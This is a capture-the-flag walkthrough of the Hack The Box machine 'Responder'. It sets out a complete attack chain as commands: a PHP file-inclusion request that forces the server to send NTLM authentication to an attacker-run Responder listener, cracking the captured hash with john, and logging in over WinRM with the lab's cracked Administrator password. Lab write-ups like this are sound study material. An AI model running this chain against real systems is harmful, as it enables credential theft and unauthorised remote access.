Machine / Machines

Responder

By Jennofrie Daguil ยท Cybersecurity and Red Team Operator

Windows Easy box exploiting PHP file inclusion to trigger NTLM authentication to an attacker-controlled Responder instance, capturing the Administrator NTLMv2 hash, cracking it, and connecting via WinRM. Attack Chain: LFI/RFI (PHP page= param) -> Responder...

EasyPublished 2026-04-12Sanitized local writeup

Scenario

Responder attack path

Windows Easy box exploiting PHP file inclusion to trigger NTLM authentication to an attacker-controlled Responder instance, capturing the Administrator NTLMv2 hash, cracking it, and connecting via WinRM. Attack Chain: LFI/RFI (PHP page= param) to Responder...

Objective

Machine walkthrough focused on Machines evidence, validation, and reusable operator lessons.

Responder sanitized attack graph

Walkthrough flow

01

Phase 2: Exploitation

02

Lessons Learned

03

Enumeration Timeline

04

Foothold (WinRM)

Source coverage

Moderate source coverage

Status: partial. This article is generated from 2 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

57% coverage
Evidence verdict

Moderate confidence: the page is useful for review, but it should be treated as partial because the available source material is thinner or less narrative-complete.

  • <TARGET>-Responder/walkthrough.md
  • HTB/<TARGET>-Responder/notes.md

Technical Walkthrough

Responder - Walkthrough

Summary

Windows Easy box exploiting PHP file inclusion to trigger NTLM authentication to an attacker-controlled Responder instance, capturing the Administrator NTLMv2 hash, cracking it, and connecting via WinRM.

Attack Chain: LFI/RFI (PHP page= param) -> Responder NTLM capture -> John hash crack -> WinRM shell

Phase 2: Exploitation

Step 1: Start Responder

bash
sudo responder -I tun0

Responder listens for incoming NTLM authentication attempts on SMB/HTTP/etc.

Step 2: Trigger NTLM Auth via File Inclusion

bash
curl -s 'http://unika.htb/index.php?page=//<TARGET>/someshare'

The PHP include() function follows the UNC path, causing the Windows server to attempt NTLM authentication to our IP.

Step 3: Capture Hash

Responder captured the NTLMv2 hash:

text
Administrator::<secret redacted>:a3b1d83c2a4d89f3:<hash redacted>:0101000000000000...

Step 4: Crack Hash

bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Result: Administrator:badminton (cracked instantly)

Step 5: WinRM Access

bash
evil-winrm -i <TARGET> -u Administrator -p badminton

Logged in as responder\administrator.

Step 6: Capture Flag

powershell
type C:<local workspace>

Flag: <hash redacted>

Key Techniques

  1. NTLM Relay/Capture: Windows will automatically send NTLM credentials when accessing a UNC path (\\IP\share). If an application can be tricked into accessing a remote UNC path, Responder can capture the hash.
  2. PHP File Inclusion to NTLM: PHP's include() on Windows will follow UNC paths (//IP/share), triggering NTLM authentication.
  3. Credential Reuse: The captured Administrator hash cracked to a weak password, allowing direct WinRM access.

Lessons Learned

  • The page= parameter accepting arbitrary paths (including UNC) is a critical vulnerability
  • Always check for WinRM (5985) on Windows targets - it's the preferred remote access once credentials are obtained
  • Responder is extremely effective when combined with any file inclusion/SSRF that can reach an attacker-controlled IP
  • Weak <password redacted> (like "badminton") in NTLMv2 hashes crack instantly against common wordlists

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Target Details

  • IP: <TARGET>
  • OS: Windows (TTL 127)
  • Hostname: <secret redacted>
  • Domain: <secret redacted> / <secret redacted>
  • Difficulty: Easy (Starting Point)
  • Attacker IP: <TARGET> (Pwnbox tun0)

Open Ports

PortServiceVersion
80HTTPApache 2.4.52 (Win64) PHP/8.1.1
5985WinRMwsman
7680pando-pubWindows Update Delivery Optimization

Enumeration Timeline

Web (Port 80)

  • Root redirects to http://unika.htb/ (added to /etc/hosts)
  • PHP web app with language selector: /index.php?page=french.html, /index.php?page=german.html
  • Vulnerability: Local/Remote File Inclusion via page= parameter
  • Confirmed: page=//<TARGET>/share triggers SMB connection back to attacker

NTLM Hash Capture

  • Started Responder on Pwnbox: sudo responder -I tun0
  • Triggered NTLM auth: curl http://unika.htb/index.php?page=//<TARGET>/someshare
  • Captured NTLMv2 hash for Administrator account
  • Hash saved at: /usr/share/responder/logs/SMB-NTLMv2-SSP-<TARGET>.txt

Hash Cracking

  • Tool: john the ripper with rockyou.txt
  • Result: Administrator:badminton
  • Crack time: <1 second

Foothold (WinRM)

  • Connected via evil-winrm: evil-winrm -i <TARGET> -u Administrator -p badminton
  • Landed as: responder\administrator

Flags

  • Flag: <hash redacted> (C:\Users\mike\Desktop\flag.txt)

Credentials

UsernamePasswordSource
AdministratorbadmintonNTLMv2 hash cracked via john/rockyou

Related insights

MachinesArchetype Walkthrough - HTB Starting PointMachinesBaseMachinesBase